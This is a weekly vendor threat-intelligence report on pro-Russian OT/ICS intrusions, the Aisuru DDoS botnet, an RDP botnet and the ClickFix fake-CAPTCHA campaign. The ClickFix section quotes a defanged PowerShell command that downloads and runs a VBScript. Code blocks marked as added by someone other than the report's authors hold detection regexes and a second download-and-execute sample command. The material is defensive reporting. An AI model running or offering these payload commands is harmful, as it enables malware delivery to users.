DigiCert’s Open-Source Intelligence (OSINT) Report – October 10 – October 16, 2025


Here is your weekly summary of news and other public coverage relevant to Vercara, the market leader in DNS, DDoS Mitigation, Web Application Firewalls, and Bot Management. Keep reading to learn about the week’s interesting and informative stories. To see all the OSINT reports, click here.

NOTE: Except where indicated, this report is released as TLP: CLEAR and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.

Pro-Russian Hacktivist Attacking OT/ICS Devices to Steal Login Credentials

(TLP: CLEAR) Recent intelligence reporting from Forescout analysts has uncovered a sophisticated cyber campaign by a newly identified pro-Russian hacktivist group dubbed “TwoNet”. According to analysts, the group has successfully compromised operational technology (OT) and industrial control systems (ICS) across multiple European critical infrastructure organizations. The group has targeted water treatment facilities, solar installations, and other industrial environments across multiple European countries, with a particular focus on utilities and energy infrastructure in nations it considers adversarial. TwoNet’s campaign represents a significant escalation in hacktivist threat capabilities, with the threat actor’s malicious activities including database enumeration, system defacement, process disruption, and credential harvesting from internet-exposed OT/ICS devices. Additional intelligence gathering efforts using honeypot infrastructure captured the group’s intrusion methodology, revealing the attackers’ expertise in exploiting default authentication mechanisms, using SQL injection techniques, and leveraging known vulnerabilities in human-machine interface (HMI) systems. Following successful database enumeration, the threat actors created a new user account named “BARLATI” and maintained access across multiple sessions spanning nearly 24 hours. TwoNet then exploited CVE-2021-26829 to inject malicious JavaScript code into the HMI login page, creating a persistent defacement that would trigger alerts whenever administrators accessed the system.

(TLP: CLEAR) Comments: The emergence of TwoNet represents a concerning paradigm shift in the “hacktivist threat landscape”, where politically motivated actors are displaying technical capabilities traditionally reserved for nation-state advanced persistent threats. The group’s ability to maintain persistence while systematically enumerating database schemas and altering critical system configurations demonstrates not only technical sophistication but also operational discipline that suggests potential state sponsorship or access to advanced training resources. The targeting of water treatment facilities and energy infrastructure specifically aligns with broader Russian strategic objectives of disrupting Western critical infrastructure, suggesting these operations may serve dual purposes as both hacktivist demonstrations and reconnaissance for potential future state-sponsored operations.

(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS V4.0 Section 5.2: “Malicious software (malware) is prevented or detected and addressed.

An anti-malware solution(s) is deployed on all system components, except for those system components identified in periodic evaluations per Requirement 5.2.3 that concludes the system components are not at risk from malware. The deployed anti-malware solution(s): 

  • Detects all known types of malware. 
  • Removes, blocks, or contains all known types of malware.

Any system components that are not at risk for malware are evaluated periodically to include the following: 

  • A documented list of all system components not at risk for malware. 
  • Identification and evaluation of evolving malware threats for those system components. 
  • Confirmation whether such system components continue to not require anti-malware protection.

The frequency of periodic evaluations of system components identified as not at risk for malware is defined in the entity’s targeted risk analysis, which is performed according to all elements specified in Requirement 12.3.1.”

Section 5.2 lays out requirements for malware detection and blocking across all devices in the Cardholder Data Environment (CDE). Every device inside the CDE should have malware protection that is kept updated and monitored, with action taken when an infection is detected.

(TLP: CLEAR) DigiCert: DigiCert’s Protective DNS solution, UltraDDR (DNS Detection and Response), functions as a recursive/resolver DNS server that receives DNS queries either via forwarding from on-network resolvers or via an endpoint client. It then uses blocklists, domain categories, artificial intelligence, or a defined policy to determine whether the domain should be allowed or blocked. Blocked user traffic is then sent to a sinkhole.

Source: https://cybersecuritynews.com/pro-russian-hacktivist-attacking-ot-ics-devices/

DDoS Botnet Aisuru Blankets US ISPs in Record DDoS

(TLP: CLEAR) Recent reporting indicates the Aisuru botnet has achieved unprecedented Distributed Denial-of-Service (DDoS) capabilities, launching a record-breaking attack that reached 29.6 terabits per second (Tbps) on October 6, 2025. According to reporting, the botnet is now drawing a majority of its firepower from compromised Internet-of-Things (IoT) devices hosted on U.S. Internet service providers such as AT&T, Comcast, and Verizon, creating significant operational challenges for network defenders and ISPs attempting to mitigate collateral damage from the botnet’s massive attack campaigns. Since its arrival on the scene more than a year ago, the botnet has steadily outcompeted virtually all other IoT-based botnets in the wild, with recent attacks siphoning Internet bandwidth from an estimated 300,000 compromised hosts worldwide. Aisuru’s evolution represents a dramatic escalation in DDoS capabilities, with recent attacks progressing from 6.35 Tbps in May 2025 to 11 Tbps days later, then topping 22 Tbps by late September before reaching 29.6 Tbps. Reporting attributes the botnet’s rapid expansion to sophisticated propagation techniques and strategic timing in the DDoS ecosystem. It was later reported that one of the Aisuru botmasters had compromised the firmware distribution website of Totolink, a maker of low-cost routers, allegedly exploiting a router firmware update server in April and distributing malicious scripts to expand the botnet’s reach. Aisuru’s current infrastructure appears to consist mostly of consumer-grade routers, security cameras, digital video recorders, and other devices running insecure and outdated firmware and/or factory-default settings.

(TLP: CLEAR) Comments: The Aisuru botnet represents a catastrophic failure of IoT security at scale, where the convergence of unpatched consumer devices, inadequate ISP egress filtering, and sophisticated botnet operations has created a wave of record-breaking DDoS capabilities. The heavy concentration of infected devices within U.S. ISP networks suggests that residential broadband infrastructure has become the unwitting backbone of global cybercriminal operations, with the sheer volume of compromised devices creating a situation where ISPs are struggling to maintain service quality for legitimate customers while their networks are weaponized against external targets. The progression from 6.35 Tbps to 29.6 Tbps attacks in just five months indicates an exponential growth trajectory that far outpaces the defensive capabilities of most organizations, effectively pricing smaller entities out of adequate DDoS protection.

(TLP: CLEAR) Recommended best practices/regulations: NIST Special Publication 800-189: “Distributed Denial-of-Service (DDoS) is a form of attack where the attack traffic is generated from many distributed sources to achieve a high-volume attack and directed towards an intended victim (i.e., system or server). To conduct a direct DDoS attack, the attacker typically makes use of a few powerful computers or a vast number of unsuspecting, compromised third-party devices (e.g., laptops, tablets, cell phones, Internet of Things (IoT) devices, etc.). The latter scenario is often implemented through botnets. In many DDoS attacks, the IP source addresses in the attack messages are “spoofed” to avoid traceability.”

(TLP: CLEAR) DigiCert: DigiCert UltraDDoS Protect provides proven and consistent DDoS protection for any of your assets, whether they reside in the cloud, multi-cloud, data center, or hybrid environments. With always-on DDoS protection, you can stop a DDoS attack instantly, and more complex DDoS attacks can be mitigated within seconds.

Source: https://krebsonsecurity.com/2025/10/ddos-botnet-aisuru-blankets-us-isps-in-record-ddos/

Massive Multi-Country Botnet Targets RDP Services in the US

(TLP: CLEAR) Threat intelligence firm GreyNoise has identified a large-scale, coordinated botnet operation targeting Remote Desktop Protocol (RDP) services across the United States. The campaign commenced on October 8, 2025, and utilizes over 100,000 unique IP addresses originating from more than 100 countries. The campaign shows signs of centralized command and control: nearly all participating IP addresses share a single TCP fingerprint, with only the Maximum Segment Size (MSS) varying between compromised botnet clusters, indicating a single operator or group orchestrating the attacks across a globally distributed infrastructure. The investigation began after GreyNoise analysts detected an anomalous spike in traffic from Brazilian-geolocated IPs, which prompted a broader analysis that quickly uncovered similar surges in activity from Argentina, Iran, China, Mexico, Russia, and South Africa. The botnet employs two specific attack vectors against exposed systems: RD Web Access timing attacks, in which attackers measure the server’s response time to login attempts to differentiate between valid and invalid usernames anonymously, and RDP web client login enumeration, which systematically attempts to guess user credentials.
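To illustrate the attribution reasoning above (many sources across many countries, one shared TCP fingerprint, MSS the only thing that varies), here is an added example that is not part of the original report or of GreyNoise’s tooling. It groups constructed connection records by TCP fingerprint and flags groups that are both large and geographically spread; the record fields, thresholds and all values are assumptions.

```python
from dataclasses import dataclass, field

# Constructed connection records as a network sensor might log RDP connection
# attempts: source IP, geolocated country, a TCP SYN fingerprint label (option
# ordering, window class, TTL class) and the MSS advertised in the SYN.
# All values are invented for this example.
SAMPLE_RECORDS = [
    ("203.0.113.10",  "BR", "fp-A", 1460),
    ("203.0.113.11",  "BR", "fp-A", 1460),
    ("198.51.100.5",  "AR", "fp-A", 1452),
    ("198.51.100.9",  "IR", "fp-A", 1400),
    ("192.0.2.77",    "CN", "fp-A", 1452),
    ("192.0.2.78",    "MX", "fp-A", 1460),
    ("192.0.2.90",    "RU", "fp-A", 1400),
    ("192.0.2.91",    "ZA", "fp-A", 1452),
    ("203.0.113.200", "US", "fp-B", 1460),   # ordinary, unrelated client
    ("203.0.113.201", "US", "fp-C", 1380),   # ordinary, unrelated client
]


@dataclass
class FingerprintGroup:
    fingerprint: str
    ips: set = field(default_factory=set)
    countries: set = field(default_factory=set)
    mss_values: set = field(default_factory=set)


def group_by_fingerprint(records):
    """Aggregate connection attempts by TCP fingerprint."""
    groups = {}
    for ip, country, fp, mss in records:
        if fp not in groups:
            groups[fp] = FingerprintGroup(fp)
        g = groups[fp]
        g.ips.add(ip)
        g.countries.add(country)
        g.mss_values.add(mss)
    return groups


def flag_coordinated(records, min_ips=5, min_countries=3):
    """Return fingerprints whose sources are numerous and spread over many
    countries yet identical at the TCP layer apart from MSS: the pattern the
    report describes as pointing to a single operator behind a distributed botnet.
    Thresholds are assumed; tune them to the sensor's baseline."""
    flagged = []
    for fp, g in group_by_fingerprint(records).items():
        if len(g.ips) >= min_ips and len(g.countries) >= min_countries:
            flagged.append({"fingerprint": fp,
                            "sources": len(g.ips),
                            "countries": sorted(g.countries),
                            "mss_clusters": sorted(g.mss_values)})
    return flagged
```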

(TLP: CLEAR) Comments: The emergence of this massive RDP-targeting botnet represents a critical threat to enterprise remote access infrastructure at a time when hybrid work models have made RDP services essential for business continuity. The botnet’s ability to coordinate attacks from over 100,000 nodes across more than 100 countries while maintaining technical consistency through shared TCP fingerprints suggests either a highly sophisticated criminal operation or potential nation-state involvement seeking to map and compromise U.S. critical infrastructure.

(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency, Selecting a Protective DNS (PDNS) Service: “The Domain Name System (DNS) is central to the operation of modern networks, translating human-readable domain names into machine-usable Internet Protocol (IP) addresses. DNS makes navigating to a website, sending an email, or making a secure shell connection easier, and is a key component of the Internet’s resilience. As with many Internet protocols, DNS was not built to withstand abuse from bad actors intent on causing harm. ‘Protective DNS’ (PDNS) is different from earlier security-related changes to DNS in that it is envisioned as a security service – not a protocol – that analyzes DNS queries and takes action to mitigate threats, leveraging the existing DNS protocol and architecture.”

(TLP: CLEAR) DigiCert: DigiCert’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters internal DNS responses for users as well as machines, using both defined categories, including botnet Command and Control (C2), and machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.

Source: https://www.bleepingcomputer.com/news/security/massive-multi-country-botnet-targets-rdp-services-in-the-us/

Hackers Registered 13,000+ Unique Domains and Leverage Cloudflare to Launch ClickFix Attacks

(TLP: CLEAR) Security researchers at Lab539 have recently identified a massive social engineering campaign dubbed “ClickFix” that has rapidly expanded to encompass over 13,000 malicious domains designed to manipulate users into executing malware on their own systems through fake CAPTCHA verification prompts. Emerging in July 2025, ClickFix rapidly expanded its reach by registering over 13,000 unique domains designed to lure users into executing malicious commands on their own devices, with a reported spike in mid-August raising alarms across multiple threat-intelligence platforms. According to security researchers, 76% of the ClickFix infrastructure already existed in Adversary-in-the-Middle (AiTM) datasets, suggesting a proliferation of as-a-service adversarial tooling operating on top of a layer of compromised infrastructure. Cloudflare emerged as the single most prevalent hosting provider, shielding 24.4% (3,345 out of 13,695) of the detected malicious domains, while the campaign’s long tail of nearly 500 other providers reveals a strategic use of diverse infrastructure to evade simple blocklists. Researchers indicated that the core infection mechanism relies on the browser’s clipboard API to plant a command that the user unwittingly pastes into a terminal, with sites writing PowerShell command sequences to the clipboard after CAPTCHA completion. A typical payload example is: “cmd /c start /min powershell -Command curl.exe -s hxxps://cf-unstable[.]mediacaptcha.txt -o $env:TEMP\captcha.vbs; Start-Process $env:TEMP\captcha.vbs”, which downloads and executes a VBScript payload without further user interaction. Furthermore, the campaign’s infrastructure characteristics indicate automated provisioning and sophisticated operational security practices. The scale of domain registration suggests an automated provisioning pipeline, likely fueled by pay-as-you-go registrar services and resold hosting, rather than the manual setup favored by advanced persistent threat (APT) actors. Additional analysis identified ClickFix campaigns abusing legitimate institutional domains, including academic (.edu, .ac) and government (.gov, .mil) resources, likely due to opportunistic compromises or poorly maintained DNS records.
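As an added example (not from the report, Lab539 or Microsoft), here is a small detector over constructed process-creation events that flags the ClickFix download-and-run pattern described above: a download utility, a drop into the user’s TEMP directory and chained execution all in one command line, optionally with a hidden window. The event fields, the regexes and the decision rule are my assumptions; the first sample command line is the one quoted in the report, the others are invented.

```python
import re

# Constructed process-creation events (image, parent image, command line),
# shaped like the fields an EDR or Sysmon Event ID 1 would carry. Values are
# invented except the first command line, which is the report's own example.
SAMPLE_EVENTS = [
    {"image": "cmd.exe", "parent": "explorer.exe",
     "cmdline": r"cmd /c start /min powershell -Command curl.exe -s hxxps://cf-unstable[.]mediacaptcha.txt -o $env:TEMP\captcha.vbs; Start-Process $env:TEMP\captcha.vbs"},
    {"image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": r"powershell -w hidden -c iwr hxxp://example[.]invalid/a -OutFile $env:TEMP\x.hta; mshta $env:TEMP\x.hta"},
    {"image": "powershell.exe", "parent": "code.exe",
     "cmdline": r"powershell -Command Get-ChildItem C:\Projects"},
    {"image": "cmd.exe", "parent": "explorer.exe",
     "cmdline": r"cmd /c curl.exe -s https://example.org/readme.txt -o C:\Users\u\readme.txt"},
]

# Each regex captures one stage of the chain; all are assumptions for this example.
DOWNLOADERS = re.compile(r"\b(curl(\.exe)?|iwr|invoke-webrequest|certutil|bitsadmin)\b", re.I)
TEMP_DROP = re.compile(r"(\$env:temp|%temp%|\\appdata\\local\\temp)\\[^\s;]+", re.I)
CHAINED_EXEC = re.compile(r"(;|&&|\|)\s*(start-process|wscript|cscript|mshta|rundll32|regsvr32)\b", re.I)
HIDDEN_SHELL = re.compile(r"start\s+/min\s+powershell|-w(indowstyle)?\s+hidden", re.I)


def score_clickfix(event):
    """Return the list of ClickFix stages seen in one event's command line."""
    cmd = event["cmdline"]
    hits = []
    if DOWNLOADERS.search(cmd):
        hits.append("downloader")
    if TEMP_DROP.search(cmd):
        hits.append("drop_to_temp")
    if CHAINED_EXEC.search(cmd):
        hits.append("chained_execution")
    if HIDDEN_SHELL.search(cmd):
        hits.append("hidden_window")
    return hits


def is_clickfix(event):
    """Flag only when download, drop-to-TEMP and chained execution co-occur;
    a lone download to a user folder (e.g. a developer fetching a file) is not flagged."""
    required = {"downloader", "drop_to_temp", "chained_execution"}
    return required <= set(score_clickfix(event))


def scan(events):
    """Return the command lines of all events matching the pattern."""
    return [e["cmdline"] for e in events if is_clickfix(e)]
```

The rule deliberately ignores the parent process, since the paste may land in the Run dialog, a terminal or PowerShell itself; pair it with your EDR’s parent-process context to reduce noise.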

(TLP: CLEAR) Comments: The aforementioned ClickFix campaign signifies a shift in social engineering attacks where threat actors have successfully weaponized the trust users place in routine security verification mechanisms like CAPTCHAs and browser security warnings. The ability to manipulate users into self-infection through clipboard manipulation eliminates many traditional security controls, as the malicious actions are performed directly by the user rather than through exploits or malicious downloads that would trigger security alerts.

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”. By enforcing a content filtering policy to block typical software download sites in addition to hacker tools and P2P services, organizations reduce the amount of malware and trojan horses that are introduced into their organization unknowingly by their users. This can be done via a protective DNS or forward web proxy solution with website categories feeds.

(TLP: CLEAR) DigiCert: DigiCert’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses a multi-petabyte data lake filled with DNS query history and indicators of compromise from multiple Cyber Threat Intelligence (CTI) data feeds to correlate an incoming DNS query in real time with previously observed malicious activity. This ensures that users and devices only go to safe, policy-compliant Internet locations.

Source: https://cybersecuritynews.com/patchwork-apt-using-powershell-commands/

Source: https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/

About Vercara

The world’s top brands depend on Vercara to safeguard their digital infrastructure and online presence. Vercara offers a suite of cloud-delivered services that are always secure, reliable, and available and enable global businesses to thrive online. UltraSecure protects organizations’ networks and applications against risks and downtime, ensuring that businesses and their customers enjoy exceptional and uninterrupted interactions all day, every day. Delivering the industry’s best performance and always-on service, Vercara’s mission-critical security portfolio provides best-in-class DNS, application, and network security, including DDoS, WAF, and Bot management services to its global 5000 customers and beyond.
